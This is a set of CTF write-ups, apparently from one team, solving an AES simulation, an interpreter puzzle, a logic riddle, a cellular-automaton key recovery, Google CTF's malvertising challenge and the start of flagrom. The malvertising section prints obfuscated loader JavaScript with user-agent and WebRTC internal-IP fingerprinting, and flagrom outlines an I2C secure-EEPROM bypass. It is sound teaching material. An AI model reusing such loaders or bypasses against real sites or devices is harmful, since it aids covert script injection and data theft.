These are “inner” wires, which we’re not supposed to see outside the module. The simulation does not provide us the status of each of these lines. These are vectors (simply put, 128 lines, one per bit), which contain some inner state, probably related to the PLAINTEXT, CIPHERTEXT, or both – we didn’t really know. The reason we suspect that is because their length is equal to 128 bits – just like our plain and cipher texts.

So we decided to tap these wires – in the same manner that the module shows output signals, we would output all these vectors and see what happens with them in different points in time. We do so by changing the aes.vhd file like the:

MIDDLETEXT1 : out STD_LOGIC_VECTOR ( 127 downto 0 ) 

... replicate per each vector you want to tap.




OBUF #### has to be unique..

  OBUF_#### : OBUF
    port map (
      I => signal_1367(127),
      O => MIDDLETEXT1(127)
    );
...replicate 128 times, per each signal (per vector, if more than 1)

And the testbench file requires some modification as well:

  wire [127:0] MIDDLETEXT1; ... add as many as you want

    AES128 aes128_inst (
    .CLK (CLK),
    .RESET (RESET),
    .ENABLE (ENABLE),
    .DONE (DONE),
    .PLAINTEXT_0 (PLAINTEXT[0]),
    ...
    .MIDDLETEXT1_0 (MIDDLETEXT1[0])

Doing so for the various internal wires and running the simulation, one can quickly recognize the key – it shows up as hex-encoded ascii characters inside one of the “tap-wires”, at an early stage of the encryption process (right after the ENABLE bit is on).

flag sha1sum: d6a311f5d58c813df40649a459284933d22e40c5

futuretran

solving futuretran 2019@ctf@hack.lu (original URL: https://fluxfingersforfuture.fluxfingers.net/challenges/35)

The task

  • Complex, unsafe languages are the past. We’ve built a new programming language for the future that uses only a fraction of the instructions of RISC. This should be easy, right?
  • In addition we have 2 files, flag.ftb and interpreter.py

Initial analysis of the interpreter.py

  1. Gets 2 parameters, code (flag.ftb) and flag to check
  2. Extracts from the code file the following parameters
    • primes – list of prime numbers sorted starting from 2
    • out – one more prime number
    • state – one more prime number
    • code – list of tuples of 2 mostly not prime numbers formatted as x/y
  3. Expands initial state:
    • multiplies the “state” by prime from the primes list power ord(corresponding character from the flag from command line)
  4. Starts to excecute the “code”:
  • for each tuple in the “code” list of tuples in the order as defined in the input file it tries to multiply the current state by the first member,
  • if the result is divisible by the second number – it divides the state, stores it, and returns to the start of the tuples
  • if no successfull division occured for all the tuples the function returns the current state
  1. Checks result:
  • if the state from the previous stage is not divisible by “out” parameter from the input file – we won

Initial observations on flag.ftb

  1. The list of primes from the file contains 37 first primes
  2. “state” and “out” are also prime numbers, but they are not in the first list of primes
  3. tuples in the code are mostly not primes
  4. after factorization of all the numbers in the flags.ftb we see at all 217 prime numbers (this includes primes list, state and out), from 2 to 1327.
  5. the “out” from flag.ftb is not in the “prime” list from the same file. This means that the only way to mix it into the “state” is successfull multiplication during “code” execution

Work log

It took for me some time to understand what exactly the interpreter.py does but after that the first thing I did was inserting some logging into the “code” execution and looking to the order of executed “code” tuples while analysing obviously false flags like flag{xxxxxxxxxxxx}. In addition I marked prime numbers associated with flag letters as FL_{num}, where num is a number of the letter in the flag and prime number associated with “out” parameter as “INDICATOR”.

Here is what I saw:

  1. There are a long sequences of instructions where primes associated with flag letters are removed from state one by one and factor 257 is added in same quantities.
  2. After each long sequence like this 257 is removed from the state by portions with sizes 64, 32, 16, 8, 4, 2 and 1 and different other primes added each time
  3. After this we have something not too much understandable
  4. Somewhere in the middle of the execution the “out” prime starts to appear in the “state”, which probably means that the flag is incorrect.
  5. Sometimes it is cleared from the “state”, but after that it always returns.

Then I had the first aha moment: whatever RISC program we are running, the “state” is its memory. It looks like that primes in the “state” are similar to variable names, and amount of these primes inside the “state” are these variable values. This actually means that every successful multiplication means addition to all its factors related variables, and division is actually subtraction correspondingly.

Let’s see it on the following example:

  • if state equals to 30 (235) it can be represented as 3 variables labeled v2, v3, and v5, and their values are {1,1,1} correspondingly.
  • if we want to multiply it by 3 and divide it by 5, the resulting state will look like {1, 2, 0} correspondingly and so on.

After understanding that I updated the logging and started to see there more understandable logs like this:

96 { FL_1:1,svc601:1,} { CNT:1,svc599:1,} # number of current “instruction” in the “code” {factorized first number of the tuple} {factorized second number of the tuple}
[ FL_1 ]: 64 –> 63 # amount of primes associated with 2nd letter of the flag decremented by 1
[ CNT ]: 44 –> 45 # a variable associated with prime 257 incremented by 1
[ svc599 ]: 0 –> 1 # service variable associated with 599 decremented
[ svc601 ]: 1 –> 0 # service variable associated with 601 incremented
95 { svc599:1,} { svc601:1,}
[ svc599 ]: 1 –> 0
[ svc601 ]: 0 –> 1
96 { FL_1:1,svc601:1,} { CNT:1,svc599:1,}
[ FL_1 ]: 63 –> 62
[ CNT ]: 45 –> 46
[ svc599 ]: 0 –> 1
[ svc601 ]: 1 –> 0
95 { svc599:1,} { svc601:1,}
[ svc599 ]: 1 –> 0
[ svc601 ]: 0 –> 1
96 { FL_1:1,svc601:1,} { CNT:1,svc601:1,}
[ FL_1 ]: 62 –> 61
[ CNT ]: 46 –> 47
[ svc599 ]: 0 –> 1
[ svc601 ]: 1 –> 0
95 { svc599:1,} { svc601:1,}
[ svc599 ]: 1 –> 0
[ svc601 ]: 0 –> 1

OK, stores and loads of our RISC program are understood.

And then (after a lot of staring into the logs in order to find control flow instructions and mapping service variables)
I had the second aha moment:
I don’t need the program. I don’t need to understand the meaning of each specific variable. I probably don’t need to reverse the “program” at all.
Traces are probably enough. We just need to avoid appearance of “out” as a factor in state.

After that I started to analyze the loads and stores of execution order. And then I understood
that the full log of the execution looks like following:

  • do something not clear
  • decrease FL_0 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_1 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_2 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_3 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_4 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_5 and increase CNT <– it looks like that here we are checking the first letter in the flag that we don’t know (the start of flag is known: flag{ )
    • do something with CNT
    • do something not clear
    • INDICATOR starts to change <– here we see evidence of the problem
    • do something not clear
    • decrease FL_6 and increase CNT
    • do something with CNT
    • do something not clear
    • INDICATOR starts to change <– problem persists
    • do something not clear
    • decrease FL_7 and increase CNT
    • do something with CNT
    • do something not clear
    • INDICATOR starts to change <– problem persists
      ………
    • return wrong value

I checked it with “fla” instead of “flag{” in the start of the flag. The problem started to appear earlier in trace. Understanding this allowed me to build the brute force which actually does the following:

    for c in flag_alphabet:
        current_flag += c
        for (a,b) in "code":
            store last letter index we worked with
            return the last letter if we see that "INDICATOR" is in
        if we see advance in letter index, remember the flag and break

The script is attached, here is the partial log of its run, and as you can see it runs around 20 minutes only:

╰─$ date; ./brute.py flag.ftb sss
Thu Oct 24 16:52:03 IDT 2019
Starting … {2: 10, 3: 1}
primes
[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157]
out
163 {163: 1}
state
269 {269: 1}
code
[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093, 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223, 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327] 217
flag{o} FL_6
Thu Oct 24 16:52:06 IDT 2019
flag{on} FL_7
Thu Oct 24 16:52:10 IDT 2019
flag{onl} FL_8
Thu Oct 24 16:52:14 IDT 2019
flag{only} FL_9
Thu Oct 24 16:52:25 IDT 2019
… skipped …
… skipped …
… skipped …
… skipped …
flag{only_a_fraction_find_this_} FL_31
Thu Oct 24 17:01:47 IDT 2019
flag{only_a_fraction_find_this_f} FL_32
Thu Oct 24 17:02:32 IDT 2019
flag{only_a_fraction_find_this_fu} FL_33
Thu Oct 24 17:04:51 IDT 2019
flag{only_a_fraction_find_this_fun} FL_34
Thu Oct 24 17:06:35 IDT 2019
flag{only_a_fraction_find_this_funn} FL_35
Thu Oct 24 17:08:26 IDT 2019
flag{only_a_fraction_find_this_funny} 1327
Thu Oct 24 17:11:50 IDT 2019

breaktime riddle

Understanding the question:

There are 2 files on the server – riddle.py and secret.py – if you solve riddle.py the secret.py consisting the flag is printed. The riddle itself is somewhat of an alteration to the classic β€œliars riddle” – given 3 people – one that always tells the truth, one that always tells a lie and one that can tell a lie and can tell the truth, detect who is who by asking anyone of them 3 questions.

Variable of this riddle:

t1: a tuple of lambdas – one that always returns the same output as input – AKA the truth teller (on true expression it returns that it is true and on False expression it returns that is false), one that returns not on the expression (AKA the liar) and one that returns random choice between true and false. (do_round)

t2: a tuple of the truth teller and the liar. (do_round)

m1: the order of the liar, truth teller and random teller (this is what we look for) – in the Q&A format, A is the first index of m1, B is the second and C is the third. (calc)

m2: called X in our Q&A (calc) – this indicates whether or not our expression will remain the same or be the opposite. (calc returns t2[X] on the manipulated expression)

i: (calc) the function we choose to use (AKA the person we choose to ask)

r: (calc) the expression we input (AKA the question we ask).

Q&A understanding:

We have a question syntax that allows us to choose which function we use in t1 and check whether A,B,C (what we look for), X, ==, 0, 1, 2 are equal, and using β€˜(β€˜ and β€˜)’ we can ask multiple equals on the same question (for example we can ask 0 X==2 or 0 (X==2)==(A==1))

The answer of the question: t2[X](t1[m1[i]](r)) – m1[i] – the index of the function we use on t1 – (m1 is randomized) running it on our question (r) and running t2[X] on the expression we received from (t1[m1[i]](r)) – which can return the expression as is or return the opposite.

The solution:

We need to get A,B and C after 3 questions. Our goal after the first question, is to get an index in m1 that is not 2 (the random function). In the first question we have 0 information, so we use index 0 in our question (we use the A (m1[0]) function of t1), and want to receive an answer that gives us which of the m1[indexes] (B or C) is not 2 (random) for sure. If A is 2 –the answer doesn’t matter – anyway we will get a non-random function. If m1[0]=A is 1, if X=1 we will return the expression (false on false = true) and if X=0 we will return the opposite of the expression (true(false) = false) – so expanding this logic to A=0 will bring us (X==A) == (B==2) will return whether C is definitely not 2 (random) or B is definitely not 2. (false)

After the first question we know an index that is not 2. Let’s assume it is C (if it was B, then replace the index of m1 to be 1 and replace every C reference with B – it is symmetric). So now we want to understand whether C is 0 or 1 (truth teller or false teller) – 2 (use m1[C]) (X == C) is telling us whether the expression returned is β€œas is” if true or the opposite if false, and if we will ask this: 2 (X == C) == (C == 0) we will know if C is truth teller or liar.

YAY – now we know if C (in our assumption) is 0 or 1. Let’s assume it is 0 – so t1[C] will return the expression as is. Now we need to understand who is 1 and who is 2 (from A and B). OK – so 2 (X == C) == (B == 2) will return whether or not B is 2 – and that’s it (A is not B and not C) J now we asked 3 questions and we know what is A, what is B and what is C – AKA m1 J

Reverse Cellular Automata

Image

We were given a single random step in a cellular automata which follows Wolfram rule 126 and its boundary condition wraps around so that the last bit is a neighbor of the first bit – 0x66de3c1bf87fdfcf .
The following image represents rule 126 by describing all possible cases and outcomes:

In order to catch the flag, we first must reverse the given step and find its previous step.
Though there can be multiple previous steps which will generate the given step. The idea is to minimize that list of possible previous steps to the minimum.
To achieve that, we can deduce the relationship between the different bits of the previous step by looking at the current step bits.
For example, if the current step is 11011, we can know for sure (because of that middle ‘0’), the corresponding previous step should be something like ?xxx? where ‘x’ is either 0 or 1. In addition (because of all other ‘1’ occurrences) we can know that there cannot be another sequence of 3 ‘x’ in the previous step (if there was, we should see more ‘0’ occurrences in the current step). So, obviously, we know that the previous step should be (!x)xxx(!x) which means either 01110 or 10001.

Following this concept, lets look on the binary representation of the actual given step:
0110011011011110001111000001101111111000011111111101111111001111
Assuming a is either 0 or 1 and b = !a, we can deduce part of the pattern of the previous step:

aabbbbaaabbba_________________________________________________ba
0110011011011110001111000001101111111000011111111101111111001111

Given another pair cd (where c is either 0 or 1 and d = !c), we can deduce another part:

_____________cdddddc____________________________________________
0110011011011110001111000001101111111000011111111101111111001111

Similarly, for pairs ef, gh, ij, kl:

____________________efffffffeeef________________________________
___________________________________ghhhhhhg_____________________
________________________________________________jiiij___________
________________________________________________________lkkkkl__
0110011011011110001111000001101111111000011111111101111111001111

Combining all parts we get the pattern:

aabbbbaaabbbacdddddcefffffffeeef___ghhhhhhg_____jiiij___lkkkklba
0110011011011110001111000001101111111000011111111101111111001111

We still got 2 sequences of 3 bits and 1 sequence of 5 bits which we couldn’t get a pattern for but we do know there cannot be any sequence of 3 of the same bit in a row in them (Otherwise we should see another ‘0’ in the current step). The 3 bit sequences must be one of [001,010,011,100,101,110] while the 5 bit sequence must be one of [00100,00101,00110,01001,01010,01011,01100,01101,10010,10011,10100,10101,10110,11001,11010,11011].

Now that we have a pretty strict pattern, we can generate all possible previous steps by constructing a binary string using this simple and dirty python script:

dic = ['0','1']
indx = [0,1]

seq3 = [(0,0,1),(0,1,0),(0,1,1),(1,0,0),(1,0,1),(1,1,0)]
seq5 = [(0,0,1,0,0),(0,0,1,0,1),(0,0,1,1,0),(0,1,0,0,1),(0,1,0,1,0),(0,1,0,1,1),(0,1,1,0,0),(0,1,1,0,1),(1,0,0,1,0),(1,0,0,1,1),(1,0,1,0,0),(1,0,1,0,1),(1,0,1,1,0),(1,1,0,0,1),(1,1,0,1,0),(1,1,0,1,1)]

for a in indx:
  for c in indx:
    for e in indx:
      for g in indx:
        for i in indx:
          for k in indx:
            for un1 in seq3:
              for un2 in seq5:
                for un3 in seq3:
                  bin_str = (dic[a]*2)+(dic[1-a]*4)+(dic[a]*3)+(dic[1-a]*3)+(dic[a]) + (dic[1-c])+(dic[c]*5)+(dic[1-c]) + (dic[1-e])+(dic[e]*7)+(dic[1-e]*3)+(dic[e]) + dic[un1[0]]+dic[un1[1]]+dic[un1[2]] + (dic[1-g])+(dic[g]*6)+(dic[1-g]) + dic[un2[0]]+dic[un2[1]]+dic[un2[2]]+dic[un2[3]]+dic[un2[4]] + (dic[1-i])+(dic[i]*3)+(dic[1-i]) + dic[un3[0]]+dic[un3[1]]+dic[un3[2]] + (dic[1-k])+(dic[k]*4)+(dic[1-k]) + (dic[1-a])+(dic[a])
                  print(bin_str)

This script will generate exactly 36864 possible previous steps. This is by far less than 2^64 (18446744073709551616):

...
1100001110001011111001111111000111001111110010110111010101111001
1100001110001011111001111111000111001111110010110111011001111001
1100001110001011111001111111000111001111110011000111000101111001
1100001110001011111001111111000111001111110011000111001001111001
1100001110001011111001111111000111001111110011000111001101111001
...

All we have to do now is iterate this list and use each entry as a key to decrypt the given encrypted flag – U2FsdGVkX1/andRK+WVfKqJILMVdx/69xjAzW4KUqsjr98GqzFR793lfNHrw1Blc8UZHWOBrRhtLx3SM38R1MpRegLTHgHzf0EAa3oUeWcQ=. Then, look for the substring ‘CTF’ in the decrypted data.

Fortunately, one of our keys, 11110001110011111001111111000100101111110011010111011001111010 (0x3c73e7f12fcd767a) decrypted the encrypted flag into such text:

stsio@stsio:/tmp/openssl-1.1.1a⟫ echo "U2FsdGVkX1/andRK+WVfKqJILMVdx/69xjAzW4KUqsjr98GqzFR793lfNHrw1Blc8UZHWOBrRhtLx3SM38R1MpRegLTHgHzf0EAa3oUeWcQ=" | openssl enc -aes-256-cbc -d -pbkdf2 -md sha1 -base64 -pass file:/tmp/3c73e7f12fcd767a.key
CTF{reversing_cellular_automatas_can_be_done_bit_by_bit}

Flag: CTF{reversing_cellular_automatas_can_be_done_bit_by_bit}

Malvertising

Unravel the layers of malvertising to uncover the Flag

https://malvertising.web.ctfcompetition.com/

Challenge overview

When we open the link we encounter a page that looks like a youtube page but after inspecting the source we can see that the page is built from a photo and an iframe.

...
<html>
...
<head>
...
  <style>
  body {
          background-image: url("bg.png");
          ...
  }
...
  </style>
</head>
<body>
...
<iframe src="ads/ad.html" width="852" height="239" frameBorder="0" scrolling="no"></iframe>
...
</body>
</html>

First Level

At this point it’s unclear what our goal is in this challenge so we just researched the iframe and hoped for the best.
Upon inspecting the iframe we can see a few interesting things:

<!DOCTYPE html>
<html>
...
<body>
...
<script id="adjs" src="./src/metrics.js" type="text/javascript"></script>
<img width=1 height=1 src="./src/apY7ERVvTFvgbHPbDwSC/1x1.png">
<img style="visibility:hidden;display:none;" height="1" width="1" />
<iframe src="bh/drts.png?drts=110322201473" ...>
</iframe>
<iframe src="bh/drts.png?drts=120322201473" ...>
</iframe>
<iframe src="bh/drts.png?drts=130322201473" ...>
</iframe>

Several things that caught our attention:

  • metrics.js
  • 1×1.png
  • 3 iframes that seem to contain nothing

1×1.png always returned an empty response.
We’ve tried playing with the drts parameter but it seems like the response was always empty so we left it.

It was time to investigate metrics.js.
Browsing the metrics.js code the following snippet at the end of the file caught our attention:

var s = b('0x16', '%RuL');
var t = document[b('0x17', 'jAUm')](b('0x18', '3hyK'));
t[b('0x19', 'F#*Z')] = function() {
    try {
        var u = steg[b('0x1a', 'OfTH')](t);
    } catch (v) {}
    if (Number(/\x61\x6e\x64\x72\x6f\x69\x64/i[b('0x1b', 'JQ&l')](navigator[b('0x1c', 'IfD@')]))) {
        s[s][s](u)();
    }
}
;

It seems like there is some access to the DOM. To figure out what this code does we’ve decided to set a breakpoint and decode the strings. We’ve set a breakpoint at the beginning of that snippet and inspected the strings.

Replacing the encoded string with decoded ones makes it easy to see what the script does:

var s = 'constructor';
var t = document['getElementById']('adimg');
t['onload'] = function() {
    try {
        var u = steg['decode'](t);
    } catch (v) {}
    if (Number(/\x61\x6e\x64\x72\x6f\x69\x64/i['test'](navigator['userAgent']))) {
        s[s][s](u)();
    }
}

The code extracts data (later to be discovered as javascript code) from the img known as adimg and saves it to the variable u. It then runs a regex on our user agent and if a match is found then it runs the javascript code stored in u.
You can see that our regex is actually ascii and \x61\x6e\x64\x72\x6f\x69\x64 is just android.

So what this code basically does is check if we have the word android (case insensitive) in our user agent and if we do it runs the code in u.
So what does u contain? We can just set a breakpoint and see:

var dJs = document.createElement('script'); dJs.setAttribute('src','./src/uHsdvEHFDwljZFhPyKxp.js'); document.head.appendChild(dJs);

To sum up, if we have the string android in our user agent a script will be added & executed to our page.

We’ll just execute u ourselves and we’re past the first level.

Second Level

The second level introduces a small script with several functions:

var T = {};
T.e0 = function(a, b) {
    // ...
}
,
T.d0 = function(a, b) {
    // ...
}
,
T.e1 = function(a, b) {
       // ...
}
,
T.d1 = function(a, b) {
    // ...
}
,
T.f0 = function(a) {
    // ...
}
,
T.longsToStr = function(a) {
    // ...
}

function dJw() {
    try {
        return navigator.platform.toUpperCase().substr(0, 5) + Number(/android/i.test(navigator.userAgent)) + Number(/AdsBot/i.test(navigator.userAgent)) + Number(/Google/i.test(navigator.userAgent)) + Number(/geoedge/i.test(navigator.userAgent)) + Number(/tmt/i.test(navigator.userAgent)) + navigator.language.toUpperCase().substr(0, 2) + Number(/tpc.googlesyndication.com/i.test(document.referrer) || /doubleclick.net/i.test(document.referrer)) + Number(/geoedge/i.test(document.referrer)) + Number(/tmt/i.test(document.referrer)) + performance.navigation.type + performance.navigation.redirectCount + Number(navigator.cookieEnabled) + Number(navigator.onLine) + navigator.appCodeName.toUpperCase().substr(0, 7) + Number(navigator.maxTouchPoints > 0) + Number((undefined == window.chrome) ? true : (undefined == window.chrome.app)) + navigator.plugins.length
    } catch (e) {
        return 'err'
    }
}
;a = "A2xcVTrDuF+EqdD8VibVZIWY2k334hwWPsIzgPgmHSapj+zeDlPqH/RHlpVCitdlxQQfzOjO01xCW/6TNqkciPRbOZsizdYNf5eEOgghG0YhmIplCBLhGdxmnvsIT/69I08I/ZvIxkWyufhLayTDzFeGZlPQfjqtY8Wr59Lkw/JggztpJYPWng=="
eval(T.d0(a, dJw()));

Lets try to decode the a variable:

> echo "A2xcVTrDuF+EqdD8VibVZIWY2k334hwWPsIzgPgmHSapj+zeDlPqH/RHlpVCitdlxQQfzOjO01xCW/6TNqkciPRbOZsizdYNf5eEOgghG0YhmIplCBLhGdxmnvsIT/69I08I/ZvIxkWyufhLayTDzFeGZlPQfjqtY8Wr59Lkw/JggztpJYPWng==" | base64 -D
��!!����f�O��#���E���Kk$��W�fS�~:�cū�����`�;i%�֞

The variable seems to be encrypted.
Judging by how it’s used it seems like T.d0 is some sort of decryption routine using the output of dJw() as key.
To continue we’ll probably have to figure out how to decrypt a.

Bruteforcing the Key

The key is built from the following things:

  • navigator.platform.toUpperCase().substr(0, 5) 5 chars (probably LINUX or ANDRO considering the if statement we had in level 1)
  • Number(/android/i.test(navigator.userAgent)) 1 char (2 options 1 or 0)
  • Number(/AdsBot/i.test(navigator.userAgent)) 1 char (2 options 1 or 0)
  • Number(/Google/i.test(navigator.userAgent)) 1 char
  • Number(/geoedge/i.test(navigator.userAgent)) 1 char
  • Number(/tmt/i.test(navigator.userAgent)) 1 char
  • navigator.language.toUpperCase().substr(0, 2) 2 chars
  • Number(/tpc.googlesyndication.com/i.test(document.referrer) || /doubleclick.net/i.test(document.referrer)) 1 char
  • Number(/geoedge/i.test(document.referrer)) 1 char
  • Number(/tmt/i.test(document.referrer)) 1 char
  • performance.navigation.type according to MDN, can only be 0, 1, 2 or 255
  • performance.navigation.redirectCount [0,∞)
  • Number(navigator.cookieEnabled) 1 char
  • Number(navigator.onLine) 1 char
  • navigator.appCodeName.toUpperCase().substr(0, 7) 7 chars, and can only be MOZILLA according to MDN
  • Number(navigator.maxTouchPoints > 0) 1 char
  • Number((undefined == window.chrome) ? true : (undefined == window.chrome.app)) 1 char
  • navigator.plugins.length [0,∞)

We were a bit worried about the unlimited options for the plugins & redirect count so we decided to look at the decrypt function:

T.d0 = function(a, b) {
    var c, d;
    return a = String(a),
    b = String(b),
    0 == a.length ? '' : (c = T.f0(a.b1()),
    d = T.f0(b.u0().slice(0, 16)),
    c.length,
    c = T.d1(c, d),
    a = T.longsToStr(c),
    a = a.replace(/\0+$/, ''),
    a.u1())
}

considering b as the key, we can see that its converted to a string and then the only usage of b is in the following statement d = T.f0(b.u0().slice(0, 16))

u0 is just encoding the string:

'undefined' == typeof String.prototype.u0 && (String.prototype.u0 = function() {
    return unescape(encodeURIComponent(this))
}

Which means only the first 16 chars of the encoded key are used in the encryption & decryption process.
Given our knowledge of dJw – our key function, we know that there are no special characters in our key, that means only the first 16 chars of the actual key are used, which actually solves our problem with the redirects & plugins.
At this point we believed we had enough to write code in order to bruteforce the key.
Our bruteforce code:

// pads number
function pad(x,n) {
    return '0'.repeat(n-x.length) + x;
}
// generates a list of integers
// in range [0, num-1] in binary string
function generate_bits(num, n_pad) {
    var l = [];
    for(var i=0;i<num;i++){
        l.push(pad(num_to_binary(i), n_pad));
    }
    return l;
}
// converts an integer to binary string
function num_to_binary(num){
    return Number(num).toString(2);
}
// navigator.platform.toUpperCase().substr(0, 5)
var platform = ['LINUX', 'ANDRO'];
// first 5 regexes
var first_part = generate_bits(2**5, 5);
// navigator.language.toUpperCase().substr(0, 2)
var possible_languages = ["EN","FR", "ES" /*...*/];
var second_part = generate_bits(2**3, 3);
// can't be 255 since we only use 16 chars
var performance_type = ['0', '1','2'];

// each of the options
var vals=[];
platform.forEach(function(_pt) {
    first_part.forEach(function(_ft){
        possible_languages.forEach(function(_pl){
            second_part.forEach(function(_sp){
                performance_type.forEach(function(_t){
                    vals.push(_pt+_ft+_pl+_sp+_t);
                });
            }); 
        }); 
    });
});
console.log(vals.length);

// actual bruteforce
vals.forEach(function(v){
    eval(T.d0(a, v));
});

We ran the script in the context of the iframe and suddenly this happened:

We got hit with an anti-debugging mechanism and a third script was added to DOM.

We can display an alert to show the code executed by our eval:

var dJs = document.createElement('script'); dJs.setAttribute('src','./src/npoTHyBXnpZWgLorNrYc.js'); document.head.appendChild(dJs);

The code simply adds the script with no other side effects.

Third Level

The last level made us scratch our heads for a bit, and we decided to try and deobfuscate the script.
First thing we had in mind is trying to deobfuscate the strings in the script and see what we can collect from there. Going up a level in the backtrace of the anti debugging code we can observe the following line:

  [_0x5877('0x72', '\x31\x23\x65\x40')](_0x5877('0x73', '\x52\x32\x4f\x54') + _0x5877('0x74', '\x62\x35\x52\x23'))[_0x5877('0x75', '\x75\x49\x67\x68')](_0x5877('0x76', '\x52\x32\x4f\x54'));

It’s quite clear that the _0x5877 method decodes the strings, so we’ve decided to write a runtime script to decode them using the _0x5877 method. Our deobfuscating script:

// our obfuscated js
var _obfuscated_js = /*our obfuscated js*/"...";
/*_0x5877('0x72', '\x31\x23\x65\x40')*/
// method regex per example above
var reg = /_0x5877\([^)]+\)/ig;

m = reg.exec(_obfuscated_js);
var deobfuscated = _obfuscated_js;
// go over all matches
while(m) {
    var method_call = m[0];
    // replace method call with string
    deobfuscated = deobfuscated.replace(method_call, '\''+eval(method_call)+'\'')
    m = reg.exec(_obfuscated_js);
}

Browsing the deobfuscated script reveals something fairly interesting towards the end:

var _0x14d30a = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/;
                var _0x4f8041 = _0x14d30a['exec'](candidate)[0x1];
                if (_0x4f8041) {
                    if (_0x4f8041['match'](/192.168.0.*/)) {
                        var _0xb9e15d = document['createElement']('script');
                        _0xb9e15d['setAttribute']('src', './src/WFmJWvYBQmZnedwpdQBU.js');
                        document['\x68\x65\x61\x64']['appendChild'](_0xb9e15d);
                    }
                }

It seems like the script uses WebRTC to determine your internal IPv4 address, and if it’s in 192.168.0.0/24 it adds a script to the DOM.
Lets see what’s in the script:

alert("CTF{I-LOVE-MALVERTISING-wkJsuw}")

And that concludes the malvertising challenge.

Summary

The challenge introduced several browser fingerprinting methods covered by obfuscation unravled layer by layer. We had a lot of fun solving this challenge and look forward to see how other teams solved it.

flagrom

In Google’s 2019 CTF competition, a few hardware challenges were introduced. This is a detailed write-up for the flagrom challenge.

If you’re only interested in the bugs and the solution – there’s a TL;DR section for you! πŸ™‚

First, we will go over the files the challenge presents, dissect them, and try to understand what we’re up against.

Once we’ve established that, we’ll understand how everything is supposed to work, and how to break it.

Finally, we’ll show the bugs and our way of solving the challenge.

We’ve tried to explain the challenge in detail, but not bloat it with code – we hope we nailed it – feedbacks are most welcome! If you spot any mistakes – please let us know!

The challenge requires knowledge in Verilog and I2C. If you are not familiar with these – we’ve tried to cover these subjects briefly in Appendices A and B accordingly, to help you gain the minimal knowledge required in order to understand and solve the challenge.

The implementation of our solution is written in C and Python.

We hope you’ll find this both fun and educating as we did πŸ™‚ – Thanks Google for a great CTF, we enjoyed the ride!

TL;DR – Show me the money (SPOILERS)

If you’re only interested in what went wrong, here’s a summary for you:

  • i2c_address_valid in seeprom.sv is not properly set in the state machine and the check could be bypassed by jumping right to I2C_START.
  • I2C_READ does not check if the current read address is secure or not – only that we don’t cross secure and non-secure bank boundaries.
  • RAW_I2C_SCL and RAW_I2C_SDA lines are available – we can bit-bang them to bypass the MMIO interface and talk directly to the I2C bus (this mimics connecting to the bus physically).
  • The solution is to start reading a byte from the first block, securing it, and then keep on reading until the end of the second block. This works if we create our own interface using the I2C lines, and skip the “stop” action / force a start to jump without resetting i2c_address_valid.

You can jump right to the end where we present the bugs in details and the exploit code.

What are we up against?

Analyzing the files

Clicking on the challenge, we are faced with the following message:

This 8051 board has a SecureEEPROM installed. It's obvious the flag is stored there. Go and get it.

8051? SecureEEPROM? OK, that doesn’t sound so bad, let’s grab those files!

The zip archive contains 4 files:

  • firmware.8051
  • firmware.c
  • flagrom
  • seeprom.sv

Let’s start with the obvious – firmware.c is some C source code. seeprom.sv is SystemVerilog – “what is .sv file” – first answer on Google, and anyone who knows Verilog would recognize that syntax. firmware.8051 is a binary blob. The suffix suggests this is some 8051 firmware file. flagrom is an ELF we can run. When we run it, we are asked to present a proof-of-work, just like we would if we’d try to connect to the real server (nc flagrom.ctfcompetition.com 1337), so we can assume that is the actual challenge running on the server.

Running the challenge

The proof-of-work can be computed pretty easily with the following Python code:

def get_pow(prefix):
    m = hashlib.md5()
    for c1 in string.printable:
        for c2 in string.printable:
            for c3 in string.printable:
                for c4 in string.printable:
                    for c5 in string.printable:
                        s = 'flagrom-' + c1 + c2 + c3 + c4 + c5
                        if hashlib.md5(s).hexdigest().startswith(prefix):
                            return s

This mechanism is in place so people won’t overload the competition’s servers, so we won’t dwell on its efficiency.

Once we present our proof-of-work, we are asked to specify a payload length, and then send the payload:

What's the length of your payload?
5
12345
Executing firmware...
[FW] Writing flag to SecureEEPROM...............DONE
[FW] Securing SecureEEPROM flag banks...........DONE
[FW] Removing flag from 8051 memory.............DONE
[FW] Writing welcome message to SecureEEPROM....DONE
Executing usercode...

The information we can gather from this log:

  • We can upload our own code. Which code exactly and to what end, we still don’t know.
  • The flag is being written to a SecureEEPROM, its bank is getting secured, and then it’s removed from some 8051 memory.
  • Our code is seemingly getting executed after the flag was written to the SecureEEPROM.

We already have multiple evidence to suggest that the code we need to upload is in fact 8051 assembly, and we can confirm our assumption by uploading the firmware.8051 file and see what happens. Before we do just that – let’s see what the file contains, to better understand the effect of the file we’re about to upload.

Analyzing the firmware files

